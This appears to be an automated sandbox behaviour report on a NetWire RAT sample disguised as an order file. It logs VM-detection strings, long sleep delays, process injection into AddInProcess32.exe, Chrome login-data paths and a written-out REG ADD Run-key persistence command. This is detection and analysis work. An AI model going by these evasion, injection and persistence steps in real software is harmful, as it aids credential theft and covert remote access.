Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\adobe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\adobe.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe	Window / User API: threadDelayed 1653	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Window / User API: threadDelayed 8128	Jump to behavior
Source: C:\Users\user\adobe.exe	Window / User API: threadDelayed 627	Jump to behavior
Source: C:\Users\user\adobe.exe	Window / User API: threadDelayed 9229	Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6936	Thread sleep count: 1653 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -59844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6936	Thread sleep count: 8128 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep count: 62 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -59704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -59547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -59391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -59282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -59141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -59032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -58032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -57891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -57751s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -57594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -57485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -57344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -57204s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -57047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -56891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -56782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -56641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -56501s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -56344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -56235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -56094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55829s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -55047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54329s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -54047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -53907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -53751s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -53594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe TID: 6932	Thread sleep time: -53485s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5296	Thread sleep count: 627 > 30	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59875s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5296	Thread sleep count: 9229 > 30	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59765s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59656s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59547s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59437s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59328s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59219s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59109s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -59000s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58890s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58781s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58672s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58562s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58453s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58344s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58187s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -58078s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57969s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57859s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57750s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57640s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57531s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57422s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57312s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57203s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -57094s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56984s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56875s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56765s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56656s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56547s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56437s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56328s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56219s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56109s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55890s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55781s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55672s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55562s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55453s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55344s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55234s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55125s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -55015s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -54906s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -54797s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -54687s >= -30000s	Jump to behavior
Source: C:\Users\user\adobe.exe TID: 5360	Thread sleep time: -54578s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 28_2_004132E6 GetSystemInfo,

28_2_004132E6

Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: vmware svga
Source: ORDER #0554.exe, 00000000.00000002.381983653.0000000001000000.00000002.00000001.sdmp, reg.exe, 00000004.00000002.217464209.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: ORDER #0554.exe, 00000000.00000002.382493023.00000000013A0000.00000004.00000001.sdmp, adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: ORDER #0554.exe, 00000000.00000002.382493023.00000000013A0000.00000004.00000001.sdmp, adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: cmd.txtQEMUqemu
Source: ORDER #0554.exe, 00000000.00000002.382493023.00000000013A0000.00000004.00000001.sdmp, adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: vmusrvc
Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: vmsrvc
Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: vmtools
Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: ORDER #0554.exe, 00000000.00000002.381983653.0000000001000000.00000002.00000001.sdmp, reg.exe, 00000004.00000002.217464209.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ORDER #0554.exe, 00000000.00000002.381983653.0000000001000000.00000002.00000001.sdmp, reg.exe, 00000004.00000002.217464209.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: adobe.exe, 00000016.00000002.604553367.0000000003E91000.00000004.00000001.sdmp	Binary or memory string: virtual-vmware pointing device
Source: ORDER #0554.exe, 00000000.00000002.381983653.0000000001000000.00000002.00000001.sdmp, reg.exe, 00000004.00000002.217464209.0000000000C20000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\ORDER #0554.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\adobe.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\adobe.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\adobe.exe

Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 422000	Jump to behavior
Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 427000	Jump to behavior
Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 42F000	Jump to behavior
Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 430000	Jump to behavior
Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 432000	Jump to behavior
Source: C:\Users\user\adobe.exe	Memory written: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe base: 7C9008	Jump to behavior

Source: C:\Users\user\Desktop\ORDER #0554.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Process created: C:\Users\user\adobe.exe 'C:\Users\user\adobe.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'svchost' /t REG_SZ /d 'C:\Users\user\adobe.exe'	Jump to behavior
Source: C:\Users\user\adobe.exe	Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Jump to behavior

Source: adobe.exe, 00000016.00000002.597385504.0000000001770000.00000002.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.595664161.0000000001630000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: adobe.exe, 00000016.00000002.597385504.0000000001770000.00000002.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.595664161.0000000001630000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: adobe.exe, 00000016.00000002.597385504.0000000001770000.00000002.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.595664161.0000000001630000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: AddInProcess32.exe, 0000001C.00000002.593700694.00000000005D5000.00000004.00000001.sdmp	Binary or memory string: Program Manager"
Source: adobe.exe, 00000016.00000002.597385504.0000000001770000.00000002.00000001.sdmp, AddInProcess32.exe, 0000001C.00000002.595664161.0000000001630000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\ORDER #0554.exe	Queries volume information: C:\Users\user\Desktop\ORDER #0554.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ORDER #0554.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\adobe.exe	Queries volume information: C:\Users\user\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Code function: 28_2_004130E8 GetUserNameW,

28_2_004130E8

Source: C:\Users\user\Desktop\ORDER #0554.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Contains functionality to steal Chrome passwords or cookies

Show sources

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: %s\Google\Chrome\User Data\Default\Login Data		28_2_0040F281
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: %s\Chromium\User Data\Default\Login Data		28_2_0040F382

Remote Access Functionality:

Yara detected NetWire RAT

Show sources

Source: Yara match	File source: 00000016.00000002.604899251.0000000004814000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.605006899.00000000048DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.598003889.0000000002EF9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.384637956.000000000474D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.384438486.0000000004684000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 4656, type: MEMORY
